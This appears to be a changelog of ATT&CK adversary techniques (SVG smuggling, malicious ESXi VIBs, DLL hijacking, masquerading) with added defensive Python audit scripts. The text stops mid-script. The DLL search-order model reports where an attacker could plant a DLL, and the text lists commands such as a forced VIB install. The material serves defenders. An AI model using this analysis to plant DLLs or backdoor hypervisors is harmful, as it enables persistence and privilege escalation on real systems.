An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides a graphical interface for remotely controlling another computer, transmitting the display output, keyboard input, and mouse control between devices using various protocols. Desktop support software such as VNC, TeamViewer, AnyDesk, ScreenConnect, LogMeIn, Ammyy Admin, and other remote monitoring and management (RMM) tools is commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access modules/features may also exist as part of otherwise existing software such as Zoom or Google Chrome’s Remote Desktop.(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)
[T1027.017] Obfuscated Files or Information: SVG Smuggling
Current version: 1.0
Description:
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include <script> tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.
SVG smuggling can take a number of forms. For example, threat actors may include content that:
- Assembles malicious payloads(Citation: Talos SVG Smuggling 2022)
- Downloads malicious payloads(Citation: Cofense SVG Smuggling 2024)
- Redirects users to malicious websites(Citation: Bleeping Computer SVG Smuggling 2024)
- Displays interactive content to users, such as fake login forms and download buttons.(Citation: Bleeping Computer SVG Smuggling 2024)
SVG Smuggling may be used in conjunction with HTML Smuggling where an SVG with a malicious payload is included inside an HTML file.(Citation: Talos SVG Smuggling 2022) SVGs may also be included in other types of documents, such as PDFs.
[T1569.003] System Services: Systemctl
Current version: 1.0
Description:
Adversaries may abuse systemctl to execute commands or programs. systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, systemctl can also be integrated into scripts or applications.
Adversaries may use systemctl to execute commands or programs as Systemd Services. Common subcommands include systemctl start, systemctl stop, systemctl enable, systemctl disable, and systemctl status.(Citation: Red Hat Systemctl 2022)
[T1673] Virtual Machine Discovery
Current version: 1.0
Description:
An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a Hypervisor CLI such as esxcli or vim-cmd (e.g., esxcli vm process list or vim-cmd vmsvc/getallvms).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: TrendMicro Play) Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host.
Adversaries may use the information from Virtual Machine Discovery during discovery to shape follow-on behaviors. Subsequently discovered VMs may be leveraged for follow-on activities such as Service Stop or Data Encrypted for Impact.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)
[T1669] Wi-Fi Networks
Current version: 1.0
Description:
Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target devices or by accessing secured Wi-Fi networks — requiring Valid Accounts — belonging to a target organization.(Citation: DOJ GRU Charges 2018)(Citation: Nearest Neighbor Volexity) Establishing a connection to a Wi-Fi access point requires a certain level of proximity to both discover and maintain a stable network connection.
Adversaries may establish a wireless connection through various methods, such as by physically positioning themselves near a Wi-Fi network to conduct close access operations. To bypass the need for physical proximity, adversaries may attempt to remotely compromise nearby third-party systems that have both wired and wireless network connections available (i.e., dual-homed systems). These third-party compromised devices can then serve as a bridge to connect to a target’s Wi-Fi network.(Citation: Nearest Neighbor Volexity)
Once an initial wireless connection is achieved, adversaries may leverage this access for follow-on activities in the victim network or further targeting of specific devices on the network. Adversaries may perform Network Sniffing or Adversary-in-the-Middle activities for Credential Access or Discovery.
[T1505.006] Server Software Component: vSphere Installation Bundles
Current version: 1.0
Description:
Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual system management in VMware environments. Since ESXi uses an in-memory filesystem where changes made to most files are stored in RAM rather than in persistent storage, these modifications are lost after a reboot. However, VIBs can be used to create startup tasks, apply custom firewall rules, or deploy binaries that persist across reboots. Typically, administrators use VIBs for updates and system maintenance.
VIBs can be broken down into three components:(Citation: VMware VIBs)
- VIB payload: a `.vgz` archive containing the directories and files to be created and executed on boot when the VIBs are loaded.
- Signature file: verifies the host acceptance level of a VIB, indicating what testing and validation has been done by VMware or its partners before publication of a VIB. By default, ESXi hosts require a minimum acceptance level of PartnerSupported for VIB installation, meaning the VIB is published by a trusted VMware partner. However, privileged users can change the default acceptance level using the `esxcli` command line interface. Additionally, VIBs are able to be installed regardless of acceptance level by using the `esxcli software vib install --force` command.
- XML descriptor file: a configuration file containing associated VIB metadata, such as the name of the VIB and its dependencies.
Adversaries may leverage malicious VIB packages to maintain persistent access to ESXi hypervisors, allowing system changes to be executed upon each bootup of ESXi – such as using `esxcli` to enable firewall rules for backdoor traffic, creating listeners on hard-coded ports, and executing backdoors.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022) Adversaries may also masquerade their malicious VIB files as PartnerSupported by modifying the XML descriptor file.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)
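The practical check that follows from the description is an inventory audit: list the VIBs on a host together with the host's acceptance level, and look for anything that could only have been installed with `--force` (or after the level was lowered) and for anything that is not in a known-good baseline. The script below is an added example, not code from ATT&CK or VMware. It parses the text output of `esxcli software vib list` and `esxcli software acceptance get`; the command output and the baseline set are constructed for the example, and the column layout follows what `esxcli` prints.

```python
"""Audit an ESXi VIB inventory for VIBs that may carry persistence.

Added example; this is not ATT&CK's or VMware's code. It parses the text
output of `esxcli software vib list` and `esxcli software acceptance get`
and flags VIBs that (a) sit below the host's acceptance level, which is only
possible with `esxcli software vib install --force` or after the level was
temporarily lowered, or (b) are absent from a known-good baseline taken from
a freshly built host. The command output and baseline below are constructed
for the example; the column layout follows what esxcli prints.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# ESXi acceptance levels from least to most trusted.
ACCEPTANCE_RANK = {
    "CommunitySupported": 0,
    "PartnerSupported": 1,
    "VMwareAccepted": 2,
    "VMwareCertified": 3,
}

# Constructed stand-in for `esxcli software acceptance get` (prints the level).
SAMPLE_ACCEPTANCE = "PartnerSupported\n"

# Constructed stand-in for `esxcli software vib list` (not captured from a real host).
SAMPLE_VIB_LIST = """\
Name                Version                         Vendor  Acceptance Level    Install Date
------------------  ------------------------------  ------  ------------------  ------------
esx-base            7.0.3-0.35.19193900             VMW     VMwareCertified     2022-03-10
vmw-ahci            2.0.11-1vmw.703.0.20.19193900   VMW     VMwareCertified     2022-03-10
net-e1000e          3.2.2.1-2vmw.703.0.20.19193900  VMW     VMwareCertified     2022-03-10
lsu-hp-hpsa-plugin  2.0.0-16vmw.703.0.20.19193900   VMW     VMwareCertified     2022-03-10
esx-update-helper   1.0.0-1                         BRG     PartnerSupported    2022-11-18
vmsyslog-ext        0.1-1                           XYZ     CommunitySupported  2022-11-18
"""

# Constructed baseline: VIB names recorded on a freshly built host of the same build.
BASELINE = frozenset({"esx-base", "vmw-ahci", "net-e1000e", "lsu-hp-hpsa-plugin"})


@dataclass(frozen=True)
class Vib:
    name: str
    version: str
    vendor: str
    acceptance: str
    install_date: str


def parse_vib_list(text: str) -> list[Vib]:
    """Parse `esxcli software vib list`: columns are padded with spaces, so
    fields are split on runs of two or more spaces; header rows are skipped."""
    vibs = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Name ", "---")):
            continue
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) != 5:
            raise ValueError(f"unexpected esxcli row: {line!r}")
        vibs.append(Vib(*fields))
    return vibs


def audit_vibs(vibs: list[Vib], host_level: str, baseline: frozenset[str]) -> list[tuple[str, str]]:
    """Return (VIB name, reason) findings for VIBs worth a closer look."""
    host_level = host_level.strip()
    host_rank = ACCEPTANCE_RANK[host_level]
    findings = []
    for v in vibs:
        rank = ACCEPTANCE_RANK.get(v.acceptance)
        if rank is None:
            findings.append((v.name, f"unknown acceptance level {v.acceptance!r}"))
        elif rank < host_rank:
            # Cannot be installed normally at this host level: --force or a lowered level.
            findings.append((v.name, f"{v.acceptance} is below host level {host_level}"))
        if v.name not in baseline:
            findings.append((v.name, f"not in baseline (vendor {v.vendor}, installed {v.install_date})"))
    return findings


def audit_sample() -> list[tuple[str, str]]:
    """Run the audit over the constructed sample data."""
    return audit_vibs(parse_vib_list(SAMPLE_VIB_LIST), SAMPLE_ACCEPTANCE, BASELINE)


if __name__ == "__main__":
    for name, reason in audit_sample():
        print(f"{name}: {reason}")
```

On a real host, feed the script the two command outputs captured over SSH or from a support bundle. The inventory check does not catch a descriptor that merely claims PartnerSupported, because `vib list` reports the level recorded in the descriptor; `esxcli software vib signature verify` checks the signature file against that claim and is the complementary check for the masquerading case.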
Major Version Changes
[T1574.001] Hijack Execution Flow: DLL
Current version: 2.0
Version changed from: 1.3 → 2.0
Old description:
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
New description:
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.
New Mitigations:
- M1013: Application Developer Guidance
- M1051: Update Software
New Detections:
- DS0009: Process (Process Creation)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-30 17:32:59.948000+00:00 | 2025-04-16 18:24:47.533000+00:00 |
name | DLL Search Order Hijacking | DLL |
description | Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. | Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation. |
x_mitre_version | 1.3 | 2.0 |
external_references[1] | {'source_name': 'Adversaries Hijack DLLs', 'description': 'CrowdStrike, Falcon OverWatch Team. (2022, December 30). Retrieved October 19, 2023.', 'url': 'https://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/'} | {'source_name': 'Hijack DLLs CrowdStrike', 'description': ' falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved January 30, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/'} |
external_references[8] | {'source_name': 'Microsoft Manifests', 'description': 'Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.', 'url': 'https://msdn.microsoft.com/en-US/library/aa375365'} | {'source_name': 'unit 42', 'description': 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22). Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30, 2025.', 'url': 'https://unit42.paloaltonetworks.com/dll-hijacking-techniques/'} |
external_references[2] | {'source_name': 'FireEye Hijacking July 2010', 'description': 'Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html'} | {'source_name': 'kroll bpl', 'description': 'Dave Truman. (2024, June 24). Novel Technique Combination Used In IDATLOADER Distribution. Retrieved January 30, 2025.', 'url': 'https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution'} |
external_references[9] | {'source_name': 'FireEye DLL Search Order Hijacking', 'description': 'Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html'} | {'source_name': 'Wietze Beukema DLL Hijacking', 'description': 'Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved April 8, 2025.', 'url': 'https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows'} |
external_references[7] | {'source_name': 'Microsoft Dynamic Link Library Search Order', 'description': 'Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.', 'url': 'https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN'} | {'source_name': 'dll pre load owasp', 'description': 'OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.', 'url': 'https://owasp.org/www-community/attacks/Binary_planting'} |
external_references[6] | {'source_name': 'Microsoft Dynamic-Link Library Redirection', 'description': 'Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.', 'url': 'https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN'} | {'source_name': 'Microsoft redirection', 'description': 'Microsoft. (2023, October 12). Dynamic-link library redirection. Retrieved January 30, 2025.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN'} |
external_references[5] | {'source_name': 'Microsoft Security Advisory 2269637', 'description': 'Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.', 'url': 'https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637'} | {'source_name': 'Microsoft - manifests/assembly', 'description': 'Microsoft. (2021, January 7). Manifests. Retrieved January 30, 2025.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN'} |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'microsoft remote preloading', 'description': 'Microsoft. (2014, May 13). Microsoft Security Advisory 2269637: Insecure Library Loading Could Allow Remote Code Execution. Retrieved January 30, 2025.', 'url': 'https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637'} |
x_mitre_contributors | | Wietze Beukema @Wietze |
x_mitre_data_sources | | Process: Process Creation |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
external_references | {'source_name': 'FireEye fxsst June 2011', 'description': 'Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html'} | |
external_references | {'source_name': 'OWASP Binary Planting', 'description': 'OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.', 'url': 'https://www.owasp.org/index.php/Binary_planting'} | |
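The restructured description distinguishes search-order hijacking, side-loading from a writable application directory, phantom DLLs and substitution, and all four fall out of one model: the ordered list of directories Windows walks for an implicitly loaded DLL, combined with which of those directories the attacker can write to. The script below is an added example, not code from ATT&CK or from any of the cited vendors. It models the default search order for a DLL requested by name that is not a Known DLL and is not covered by a manifest or `.local` redirection; the file inventory, writable directories and PATH are constructed, and the DLL names are placeholders rather than claims about specific products.

```python
"""Model the Windows DLL search order and classify hijack opportunities.

Added example; it is not code from ATT&CK or from any vendor cited above.
It models the search order for a DLL that is requested by name, is not a
Known DLL, and is not covered by a manifest or .local redirection, with
SafeDllSearchMode on (the default):

  1. the application's directory
  2. the system directory (C:\\Windows\\System32)
  3. the 16-bit system directory (C:\\Windows\\System)
  4. the Windows directory (C:\\Windows)
  5. the current working directory
  6. each directory on PATH, in order

With SafeDllSearchMode off, the current working directory moves to step 2.
The file inventory, writable directories and PATH below are constructed;
resolve() reports where the DLL would load from and how an attacker could
intervene.
"""
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class Host:
    files: frozenset[str]      # full paths that exist, lower case
    writable: frozenset[str]   # directories the current user can write to, lower case
    windows_dir: str = "c:\\windows"


@dataclass(frozen=True)
class Resolution:
    kind: str                  # resolved | hijackable | substitution | phantom
    loads_from: str | None     # directory that currently supplies the DLL
    plant_dir: str | None      # first writable directory an attacker could use


def _norm(path: str) -> str:
    return path.lower().rstrip("\\")


def search_order(app_dir: str, cwd: str, path_dirs: list[str], host: Host,
                 safe_mode: bool = True) -> list[str]:
    """Directories searched, in order, for an implicitly loaded DLL."""
    system32 = host.windows_dir + "\\system32"
    system16 = host.windows_dir + "\\system"
    if safe_mode:
        order = [app_dir, system32, system16, host.windows_dir, cwd, *path_dirs]
    else:
        order = [app_dir, cwd, system32, system16, host.windows_dir, *path_dirs]
    return [_norm(d) for d in order]


def resolve(dll: str, app_dir: str, cwd: str, path_dirs: list[str], host: Host,
            safe_mode: bool = True) -> Resolution:
    """Walk the search order and classify the first hit (or the lack of one)."""
    dll = dll.lower()
    first_writable = None
    for d in search_order(app_dir, cwd, path_dirs, host, safe_mode):
        if first_writable is None and d in host.writable:
            first_writable = d
        if f"{d}\\{dll}" in host.files:
            if d in host.writable:
                # The legitimate copy lives in a writable directory: overwrite it in place.
                return Resolution("substitution", d, d)
            if first_writable is not None:
                # A writable directory is searched before the real copy: plant a copy there.
                return Resolution("hijackable", d, first_writable)
            return Resolution("resolved", d, None)
    # Nothing on the path supplies the DLL: any writable directory on it wins.
    return Resolution("phantom", None, first_writable)


# Constructed inventory for the walkthrough (placeholder names, not real products).
HOST = Host(
    files=frozenset({
        "c:\\windows\\system32\\version.dll",
        "c:\\windows\\system32\\dbghelp.dll",
        "c:\\tools\\helper.dll",
    }),
    writable=frozenset({
        "c:\\users\\alice\\downloads",  # the user's cwd when launching from Explorer
        "c:\\tools",                    # a user-installed tool directory
        "c:\\python39",                 # a user-writable directory that sits on PATH
    }),
)
PATH = ["c:\\windows\\system32", "c:\\python39"]
VENDOR_APP_DIR = "c:\\program files\\vendor"   # not writable by the user
DOWNLOADS = "c:\\users\\alice\\downloads"


def walkthrough() -> dict[str, Resolution]:
    """Cases that map onto the sub-techniques described in the text."""
    return {
        # Search order (safe mode): System32 is checked before cwd, so this is safe.
        "search_order_safe": resolve("version.dll", VENDOR_APP_DIR, DOWNLOADS, PATH, HOST),
        # Search order (SafeDllSearchMode off): cwd is checked before System32.
        "search_order_unsafe": resolve("version.dll", VENDOR_APP_DIR, DOWNLOADS, PATH, HOST, safe_mode=False),
        # Writable app directory, as when a trusted binary is dropped next to a payload (side-loading).
        "app_dir_writable": resolve("dbghelp.dll", "c:\\tools", DOWNLOADS, PATH, HOST),
        # Substitution: a DLL the app already ships, sitting in a writable directory.
        "substitution": resolve("helper.dll", "c:\\tools", DOWNLOADS, PATH, HOST),
        # Phantom: the DLL does not exist anywhere on the search path.
        "phantom": resolve("plugin.dll", VENDOR_APP_DIR, DOWNLOADS, PATH, HOST),
    }


if __name__ == "__main__":
    for case, r in walkthrough().items():
        print(f"{case:20} {r.kind:12} loads_from={r.loads_from} plant_dir={r.plant_dir}")
```

To turn this into an audit of a real host, populate `files` from the import tables of the binaries you care about (one entry per imported DLL name, resolved against each directory in the order) and `writable` from an ACL walk as the account of interest; the privilege-escalation case in the text is simply this model evaluated for a service binary with `writable` computed for a low-privileged user.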
[T1036.005] Masquerading: Match Legitimate Resource Name or Location
Current version: 2.0
Version changed from: 1.2 → 2.0
Old description:
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.
New description:
Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation.
This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:30:45.064000+00:00 | 2025-04-15 19:58:11.443000+00:00 |
name | Match Legitimate Name or Location | Match Legitimate Resource Name or Location |
description | Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic. | Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation.
This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023) |
x_mitre_version | 1.2 | 2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Aquasec Kubernetes Backdoor 2023', 'description': 'Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March 24, 2025.', 'url': 'https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/'} |
x_mitre_platforms | | ESXi |
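The broadened technique now covers three distinct checks a detection engineer would want: a legitimate name running from the wrong location, a near-miss spelling of a legitimate name, and homoglyph substitutions (0 for o, rn for m). The same comparison applies whether the resource is a file, a Registry key name or a Kubernetes namespace. The script below is an added example, not ATT&CK's code; the table of legitimate names and their allowed locations, the homoglyph list and the distance thresholds are constructed for the example and would be tuned per environment.

```python
"""Flag resource names that match or approximate a legitimate name.

Added example; not ATT&CK's code. It covers the three cases the technique
describes: a legitimate name in the wrong location, a near-miss spelling of
a legitimate name (files, Registry key names, Kubernetes namespaces alike),
and homoglyph substitutions such as 0 for o or rn for m. The legitimate-name
table, the homoglyph list and the thresholds are constructed for the example.
"""
from __future__ import annotations

# Legitimate name -> directories it may legitimately run from
# (None: location is not checked). Constructed, not exhaustive.
LEGITIMATE = {
    "svchost.exe": frozenset({"c:\\windows\\system32", "c:\\windows\\syswow64"}),
    "lsass.exe": frozenset({"c:\\windows\\system32"}),
    "explorer.exe": frozenset({"c:\\windows"}),
    "RunOnce": None,          # Registry key under ...\CurrentVersion
    "kube-system": None,      # Kubernetes namespace
    "kube-public": None,
}

# Visually similar substitutions used in look-alike names; multi-character pairs first.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("|", "l")]


def normalize(name: str) -> str:
    """Lower-case and fold homoglyphs so 'svch0st' compares equal to 'svchost'."""
    s = name.lower()
    for bad, good in HOMOGLYPHS:
        s = s.replace(bad, good)
    return s


def levenshtein(a: str, b: str) -> int:
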